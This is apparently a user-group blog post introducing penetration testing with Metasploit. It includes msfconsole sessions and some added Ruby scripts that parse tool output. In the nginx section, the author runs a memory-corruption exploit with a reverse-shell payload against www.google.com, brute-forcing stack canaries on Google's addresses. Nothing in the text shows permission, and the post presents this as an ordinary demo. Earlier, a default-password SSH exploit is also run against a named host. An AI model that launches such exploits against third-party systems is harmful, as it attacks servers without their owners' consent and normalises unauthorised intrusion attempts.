NetSIG Summer Fun: PenTesting with Metasploit


NetSIG Summer Fun

by Craig Miller

This summer we'll do less presenting, and more discussing Network topics. This month we'll talk about Penetration testing with Metasploit.

The Metasploit Project is a computer security project owned by Boston, Massachusetts-based security company Rapid7. Its best-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.

Start with Kali

Starting with Kali makes it much easier to run Metasploit Framework. In fact, it can be installed with one line:

apt-get install metasploit-framework

Running Kali isn't hard if you use a virtual machine or a Linux container. Daily builds of Kali are in the Linux Containers image repo (the images: remote). Just another reason to get LXD up and running.

There's a lot of Metasploit

The main entry point into Metasploit Framework is msfconsole. Much of Metasploit Framework is written in Ruby, which means startup on a Raspberry Pi is pretty slow (give it about a minute).

       =[ metasploit v6.2.11-dev                          ]
+ -- --=[ 2233 exploits - 1179 auxiliary - 398 post       ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use the resource command to run 
commands from a file

msf6 > 

Many of the penetration tests will require root to run. Since we are running in a container, running as root means less risk to the host OS.

Looking at available exploits

As the banner shows, there are a lot of exploits, payloads, et cetera to choose from. But where to start?

A good place to start is to look for unix/linux exploits. In the msfconsole:

msf6 > search type:exploit platform:unix

Matching Modules
================

   #    Name                                                                               Disclosure Date  Rank       Check  Description
   -    ----                                                                               ---------------  ----       -----  -----------
   0    exploit/multi/http/apache_apisix_api_default_token_rce                             2020-12-07       excellent  Yes    APISIX Admin API default access token RCE
   1    exploit/linux/local/apt_package_manager_persistence                                1999-03-09       excellent  No     APT Package Manager Persistence
   2    exploit/linux/misc/asus_infosvr_auth_bypass_exec                                   2015-01-04       excellent  No     ASUS infosvr Auth Bypass Command Execution
   3    exploit/unix/webapp/awstatstotals_multisort                                        2008-08-26       excellent  Yes    AWStats Totals multisort Remote Command Execution
   4    exploit/unix/webapp/awstats_configdir_exec                                         2005-01-15       excellent  Yes    AWStats configdir Remote Command Execution
...
   405  exploit/multi/http/vbulletin_widget_template_rce                                   2020-08-09       excellent  Yes    vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.
   406  exploit/unix/webapp/php_vbulletin_template                                         2005-02-25       excellent  Yes    vBulletin misc.php Template Name Arbitrary Code Execution
   407  exploit/multi/http/vbulletin_widgetconfig_rce                                      2019-09-23       excellent  Yes    vBulletin widgetConfig RCE
   408  exploit/multi/misc/w3tw0rk_exec                                                    2015-06-04       excellent  Yes    w3tw0rk / Pitbul IRC Bot  Remote Code Execution


Interact with a module by name or index. For example info 408, use 408 or use exploit/multi/misc/w3tw0rk_exec
msf6 > 

As you can see there are many. It is possible to do more specific searches using grep:

msf6 > grep scanner search ssh
   1   auxiliary/scanner/ssh/apache_karaf_command_execution        2016-02-09       normal     No     Apache Karaf Default Credentials Command Execution
   2   auxiliary/scanner/ssh/karaf_login                                            normal     No     Apache Karaf Login Utility
   7   auxiliary/scanner/ssh/cerberus_sftp_enumusers               2014-05-27       normal     No     Cerberus FTP Server SFTP Username Enumeration
   10  auxiliary/scanner/http/cisco_firepower_login                                 normal     No     Cisco Firepower Management Console 6.0 Login
   12  auxiliary/scanner/ssh/eaton_xpert_backdoor                  2018-07-18       normal     No     Eaton Xpert Meter SSH Private Key Exposure Scanner
   15  auxiliary/scanner/ssh/fortinet_backdoor                     2016-01-09       normal     No     Fortinet SSH Backdoor Scanner
   20  auxiliary/scanner/http/gitlab_user_enum                     2014-11-21       normal     No     GitLab User Enumeration
   26  auxiliary/scanner/ssh/juniper_backdoor                      2015-12-20       normal     No     Juniper SSH Backdoor Scanner
   27  auxiliary/scanner/ssh/detect_kippo                                           normal     No     Kippo SSH Honeypot Detector
   46  auxiliary/scanner/ssh/ssh_login                                              normal     No     SSH Login Check Scanner
   47  auxiliary/scanner/ssh/ssh_identify_pubkeys                                   normal     No     SSH Public Key Acceptance Scanner
   48  auxiliary/scanner/ssh/ssh_login_pubkey                                       normal     No     SSH Public Key Login Scanner
   50  auxiliary/scanner/ssh/ssh_enumusers                                          normal     No     SSH Username Enumeration
   52  auxiliary/scanner/ssh/ssh_version                                            normal     No     SSH Version Scanner
   63  auxiliary/scanner/ssh/ssh_enum_git_keys                                      normal     No     Test SSH Github Access
   71  auxiliary/scanner/ssh/libssh_auth_bypass                    2018-10-16       normal     No     libssh Authentication Bypass Scanner
msf6 > 
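The search output above is easy to scan by eye but awkward to filter beyond what grep offers. The Ruby script below is an added example, not part of the article or of Metasploit Framework: it parses the module table msfconsole prints (index, name, optional disclosure date, rank, check flag, description) into records and filters them, here down to the SSH scanner modules that carry a disclosure date. The sample text is constructed from the grep output above, trimmed to five rows; the function and constant names are my own.

```ruby
# Added example (not from the article or from Metasploit): parse the module
# table that msfconsole's `search` command prints and filter it further.

# Ranks exactly as Metasploit prints them in the Rank column.
RANKS = %w[manual low average normal good great excellent].freeze

# One table row. The Disclosure Date column is optional, which is why a naive
# split on whitespace misaligns the columns for rows that lack a date.
ROW_RE = /\A\s*(?<index>\d+)\s+(?<name>\S+)\s+(?:(?<date>\d{4}-\d{2}-\d{2})\s+)?(?<rank>#{RANKS.join('|')})\s+(?<check>Yes|No)\s+(?<desc>.*?)\s*\z/

# Turns raw msfconsole text into an array of module records; non-row lines
# (the prompt, headers, "Matching Modules") are ignored.
def parse_module_table(text)
  text.each_line.filter_map do |line|
    m = ROW_RE.match(line) or next
    type, path = m[:name].split('/', 2)
    {
      index: m[:index].to_i,
      name: m[:name],
      type: type,                  # "exploit", "auxiliary", "post", ...
      path: path,                  # e.g. "scanner/ssh/ssh_login"
      disclosure_date: m[:date],   # nil when the column is blank
      rank: m[:rank],
      check: m[:check] == 'Yes',   # module supports the `check` command
      description: m[:desc]
    }
  end
end

# Keeps modules matching every criterion given: module type, a substring of
# the path, and whether a disclosure date is present (a known, dated bug).
def filter_modules(mods, type: nil, path_includes: nil, dated: nil)
  mods.select do |mod|
    (type.nil? || mod[:type] == type) &&
      (path_includes.nil? || mod[:path].include?(path_includes)) &&
      (dated.nil? || (!mod[:disclosure_date].nil?) == dated)
  end
end

# Constructed sample: five rows taken from the article's grep output.
SAMPLE_SEARCH_OUTPUT = <<~OUT
  msf6 > grep scanner search ssh
     1   auxiliary/scanner/ssh/apache_karaf_command_execution        2016-02-09       normal     No     Apache Karaf Default Credentials Command Execution
     2   auxiliary/scanner/ssh/karaf_login                                            normal     No     Apache Karaf Login Utility
     10  auxiliary/scanner/http/cisco_firepower_login                                 normal     No     Cisco Firepower Management Console 6.0 Login
     46  auxiliary/scanner/ssh/ssh_login                                              normal     No     SSH Login Check Scanner
     71  auxiliary/scanner/ssh/libssh_auth_bypass                    2018-10-16       normal     No     libssh Authentication Bypass Scanner
  msf6 >
OUT

if __FILE__ == $PROGRAM_NAME
  mods = parse_module_table(SAMPLE_SEARCH_OUTPUT)
  filter_modules(mods, path_includes: 'scanner/ssh', dated: true).each do |mod|
    puts "#{mod[:name]} (#{mod[:disclosure_date]}): #{mod[:description]}"
  end
end
```

Paste the full output of a search into SAMPLE_SEARCH_OUTPUT (or read it from a file) and the same two functions work unchanged; the regex is what keeps rows without a disclosure date from shifting the rank and check columns.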

Running an exploit test

Many of the exploits have parameters which need to be set before the pentest can be run. To see the options, select an exploit using the use command.

msf6 > use exploit/apple_ios/ssh/cydia_default_ssh

To see the available options:

msf6 exploit(apple_ios/ssh/cydia_default_ssh) > show options

Module options (exploit/apple_ios/ssh/cydia_default_ssh):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   22               yes       The target port


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Apple iOS


msf6 exploit(apple_ios/ssh/cydia_default_ssh) > 

A key option for most exploits is RHOSTS, which tells Metasploit the target. The nice thing is that RHOSTS can be an IPv4 or IPv6 address, or even better a DNS name which resolves to an IPv4 or IPv6 address.

msf6 exploit(apple_ios/ssh/cydia_default_ssh) > set RHOSTS 6haiku.hoomaha.net
RHOSTS => 6haiku.hoomaha.net
msf6 exploit(apple_ios/ssh/cydia_default_ssh) > run

[*] 2607:c000:8011:fd44:ea9f:80ff:fef3:fd47:22 - Attempt to login as 'root' with password 'alpine'
[-] 2607:c000:8011:fd44:ea9f:80ff:fef3:fd47:22 SSH - Failed authentication
[*] 2607:c000:8011:fd44:ea9f:80ff:fef3:fd47:22 - Attempt to login as 'mobile' with password 'dottie'
[-] 2607:c000:8011:fd44:ea9f:80ff:fef3:fd47:22 SSH - Failed authentication
[*] Exploit completed, but no session was created.
msf6 exploit(apple_ios/ssh/cydia_default_ssh) > 

This is an iOS (iPhone) exploit; in the example above it is given a non-iOS device to test, so it fails, because the default logins the exploit tries do not exist on that host.

Demo against an old Win7 Machine

A tricky part of showing off a pentesting tool is finding a target. A nice tutorial which exploits a Win7 machine can be found on linuxhint.com.

Running an exploit against a webserver, nginx

After using Apache webserver for 25 years, I have migrated to nginx, which does some things nicer and more easily than the venerable Apache. Apparently an old version of nginx has an exploit which can be pentested.

msf6 > use linux/http/nginx_chunked_size
msf6 exploit(linux/http/nginx_chunked_size) > show options

Module options (exploit/linux/http/nginx_chunked_size):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   80               yes       The remote HTTP server port (TCP)


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.215.181  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Ubuntu 13.04 32bit - nginx 1.4.0


msf6 exploit(linux/http/nginx_chunked_size) > 

Note that RHOSTS and any other options you set for a previous pentest have been cleared. You will need to set them again, and then run the pentest.

msf6 exploit(linux/http/nginx_chunked_size) > set RHOSTS www.google.com
RHOSTS => www.google.com
msf6 exploit(linux/http/nginx_chunked_size) > run
[*] Exploiting target 2607:f8b0:400b:803::2004

[*] Started reverse TCP handler on 192.168.215.181:4444 
[*] 2607:f8b0:400b:803::2004:80 - Searching for stack canary
[*] 2607:f8b0:400b:803::2004:80 - Assuming byte 0 0x00
[*] 2607:f8b0:400b:803::2004:80 - Brute forcing byte 1
[+] 2607:f8b0:400b:803::2004:80 - Byte 1 found: 0x00
[*] 2607:f8b0:400b:803::2004:80 - Brute forcing byte 2
[+] 2607:f8b0:400b:803::2004:80 - Byte 2 found: 0x00
[*] 2607:f8b0:400b:803::2004:80 - Brute forcing byte 3
[+] 2607:f8b0:400b:803::2004:80 - Byte 3 found: 0x00
[-] 2607:f8b0:400b:803::2004:80 - Exploit aborted due to failure: unknown: 2607:f8b0:400b:803::2004:80 - Unable to find stack canary
[*] Exploiting target 172.217.14.196
[*] Started reverse TCP handler on 192.168.215.181:4444 
[*] 172.217.14.196:80 - Searching for stack canary
[*] 172.217.14.196:80 - Assuming byte 0 0x00
[*] 172.217.14.196:80 - Brute forcing byte 1
[+] 172.217.14.196:80 - Byte 1 found: 0x00
[*] 172.217.14.196:80 - Brute forcing byte 2
[+] 172.217.14.196:80 - Byte 2 found: 0x00
[*] 172.217.14.196:80 - Brute forcing byte 3
[+] 172.217.14.196:80 - Byte 3 found: 0x00
[-] 172.217.14.196:80 - Exploit aborted due to failure: unknown: 172.217.14.196:80 - Unable to find stack canary
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nginx_chunked_size) > 

Since www.google.com resolves to both an IPv4 and IPv6 address, the exploit pentest is run against both IP addresses.
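Reading the per-address result out of a run like the one above gets tedious once RHOSTS resolves to several addresses. As an added example (not from the article or from Metasploit Framework), the Ruby script below parses the [*]/[+]/[-] status lines, splits host from port at the last colon so IPv6 addresses survive, and reports for each target its address family, the number of status events and why the module aborted. The sample output is constructed from the nginx run above, trimmed; the "session N opened" success pattern is an assumption, as this page only shows failed runs, and the function names are my own.

```ruby
# Added example (not from the article or from Metasploit): summarise the
# status lines msfconsole prints while a module runs, one entry per target.
require 'ipaddr'

# A status line is "[tag] body"; the tags seen in msfconsole output are [*] [+] [-] [!].
STATUS_RE = /\A\[(?<tag>[*+\-!])\]\s+(?<body>.*)\z/

# "host:port" -> [host, port]. IPv6 addresses contain colons themselves, so
# the port is whatever follows the *last* colon; a token without a numeric
# port (a bare address or DNS name) keeps port nil.
def split_host_port(token)
  host, sep, port = token.rpartition(':')
  return [token, nil] if sep.empty? || port !~ /\A\d+\z/
  [host, port.to_i]
end

def address_family(host)
  IPAddr.new(host).ipv6? ? 'IPv6' : 'IPv4'
rescue IPAddr::InvalidAddressError
  'unknown' # a DNS name or other non-address token
end

# Returns { targets: { host => { family:, port:, events:, aborted: } },
#           session_created: true/false }.
def summarize_run(output)
  targets = Hash.new do |h, host|
    h[host] = { family: address_family(host), port: nil, events: 0, aborted: nil }
  end
  output.each_line(chomp: true) do |line|
    m = STATUS_RE.match(line) or next
    body = m[:body]
    # "[*] Exploiting target X" opens a new per-address section when the
    # RHOSTS name resolved to more than one address.
    if (host = body[/\AExploiting target (\S+)/, 1])
      targets[host]
      next
    end
    # Per-target lines read "addr:port - message"; lines without that
    # separator (handler start-up, the final "Exploit completed") carry no target.
    token, sep, msg = body.partition(' - ')
    next if sep.empty?
    host, port = split_host_port(token.split.first)
    entry = targets[host]
    entry[:port] ||= port
    entry[:events] += 1
    if (reason = msg[/\AExploit aborted due to failure: (.*)\z/, 1])
      # msfconsole repeats "addr:port - " inside the reason; drop it.
      entry[:aborted] = reason.sub("#{token} - ", '')
    end
  end
  # Assumption: a successful run prints "... session N opened ..."; the
  # article's runs instead end with "Exploit completed, but no session was created."
  { targets: targets.to_a.to_h, session_created: output.match?(/session \d+ opened/i) }
end

# Constructed sample: the article's nginx run against www.google.com, trimmed.
SAMPLE_RUN_OUTPUT = <<~OUT
  [*] Exploiting target 2607:f8b0:400b:803::2004

  [*] Started reverse TCP handler on 192.168.215.181:4444
  [*] 2607:f8b0:400b:803::2004:80 - Searching for stack canary
  [*] 2607:f8b0:400b:803::2004:80 - Brute forcing byte 1
  [+] 2607:f8b0:400b:803::2004:80 - Byte 1 found: 0x00
  [-] 2607:f8b0:400b:803::2004:80 - Exploit aborted due to failure: unknown: 2607:f8b0:400b:803::2004:80 - Unable to find stack canary
  [*] Exploiting target 172.217.14.196
  [*] Started reverse TCP handler on 192.168.215.181:4444
  [*] 172.217.14.196:80 - Searching for stack canary
  [*] 172.217.14.196:80 - Brute forcing byte 1
  [+] 172.217.14.196:80 - Byte 1 found: 0x00
  [-] 172.217.14.196:80 - Exploit aborted due to failure: unknown: 172.217.14.196:80 - Unable to find stack canary
  [*] Exploit completed, but no session was created.
OUT

if __FILE__ == $PROGRAM_NAME
  summary = summarize_run(SAMPLE_RUN_OUTPUT)
  summary[:targets].each do |host, t|
    puts "#{host} (#{t[:family]}, port #{t[:port]}): #{t[:events]} events, aborted: #{t[:aborted] || 'no'}"
  end
  puts "session created: #{summary[:session_created]}"
end
```

The same parser handles the iOS run earlier on the page, where the failure lines read "addr:22 SSH - Failed authentication": taking the first whitespace-delimited word of the token before splitting off the port is what keeps "SSH" from being mistaken for part of the address.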

Knowledge is important

This introduction won't turn you into an instant Metasploit Framework pentester. For example, www.google.com isn't using nginx as a webserver, so naturally the nginx exploit would fail. A simple look with curl will tell you what kind of web server Google is using:

$ curl -I https://www.google.com
HTTP/2 200 
content-type: text/html; charset=ISO-8859-1
p3p: CP="This is not a P3P policy! See g.co/p3phelp for more info."
date: Thu, 18 Aug 2022 21:55:39 GMT
server: gws

And a quick check for exploits against gws using the msfconsole will show that there are none included.
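One way to make that check before picking a module, as an added example that is not part of the article or of Metasploit Framework: the Ruby script below extracts the Server header from curl -I output like the block above and compares it with the product and version named in a module's Exploit target line (here "Ubuntu 13.04 32bit - nginx 1.4.0" from the nginx module's show options). The sample headers are constructed from the curl output above; fetch_server_header is the live counterpart using Ruby's Net::HTTP and is not exercised by the sample; all function names are my own.

```ruby
# Added example (not from the article or from Metasploit): does the Server
# header of a web server match the product/version an exploit module targets?
require 'net/http'
require 'uri'

# Returns the Server header value from raw "curl -I" output, or nil if the
# server sends none. Header names are case-insensitive ("Server:", "server:").
def server_header(raw_headers)
  raw_headers.each_line(chomp: true) do |line|
    name, sep, value = line.partition(':')
    return value.strip if !sep.empty? && name.strip.casecmp?('server')
  end
  nil
end

# Extracts [product, version] from text such as "nginx 1.4.0", "nginx/1.4.0"
# or "Apache/2.4.54 (Ubuntu)". Version is nil when absent ("gws", or a server
# configured to hide its version).
def product_version(text)
  m = text.match(%r{([A-Za-z][\w-]*)(?:[\s/]+(\d+(?:\.\d+)*))?})
  m ? [m[1].downcase, m[2]] : nil
end

# Compares a Server header value with a module's target name.
#   true  -> product and version match the target
#   false -> different product, or same product but a different version
#   nil   -> same product but the server hides its version, so undecided
def target_applies?(server_value, target_name)
  return false if server_value.nil?
  have = product_version(server_value)
  want = product_version(target_name.split(' - ').last) # "nginx 1.4.0"
  return false if have.nil? || want.nil? || have[0] != want[0]
  return true if want[1].nil?  # target names only a product
  return nil if have[1].nil?   # version hidden by the server
  have[1] == want[1]
end

# Live counterpart: HEAD request to a URL, returning its Server header.
def fetch_server_header(url)
  uri = URI(url)
  Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == 'https') do |http|
    http.head(uri.path.empty? ? '/' : uri.path)['server']
  end
end

# Constructed sample: the article's curl -I output for www.google.com.
SAMPLE_CURL_HEADERS = <<~HDR
  HTTP/2 200
  content-type: text/html; charset=ISO-8859-1
  p3p: CP="This is not a P3P policy! See g.co/p3phelp for more info."
  date: Thu, 18 Aug 2022 21:55:39 GMT
  server: gws
HDR

# Exploit target name as shown by `show options` for linux/http/nginx_chunked_size.
NGINX_TARGET = 'Ubuntu 13.04 32bit - nginx 1.4.0'

if __FILE__ == $PROGRAM_NAME
  server = server_header(SAMPLE_CURL_HEADERS)
  puts "server: #{server.inspect}, target applies: #{target_applies?(server, NGINX_TARGET).inspect}"
end
```

A nil result is the honest answer for a server that hides its version; it tells you the module might apply but that only the module's own check command (where the Check column says Yes) can settle it.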

Metasploit Framework & Pentesting

Metasploit Framework is a great tool for pentesting. Not only is there a large body of included exploits, but you can also create your own via rc scripts.

If you want to learn more about Metasploit Framework and pentesting, search online; there is a ton of information.



18 August 2022